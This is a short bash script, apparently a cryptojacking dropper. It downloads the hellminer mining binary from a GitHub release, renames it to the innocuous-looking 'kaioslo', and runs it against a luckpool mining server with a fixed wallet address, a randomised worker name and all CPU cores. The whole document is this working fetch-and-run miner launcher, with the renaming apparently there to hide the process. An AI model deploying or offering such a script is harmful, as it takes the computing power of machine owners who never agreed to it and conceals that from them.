#!/bin/bash
wget https://github.com/hellcatz/hminer/releases/download/v0.59.1/hellminer_linux64_avx2.tar.gz
tar xf hellminer_linux64_avx2.tar.gz
mv hellminer kaioslo
./kaioslo -c stratum+tcp://na.luckpool.net:3956 -u RUfB3cXeuFP2itqaiAF4ov1cx17RBLxppw.$(echo $RANDOM | md5sum | head -c 10) -p x --cpu $(nproc --all)
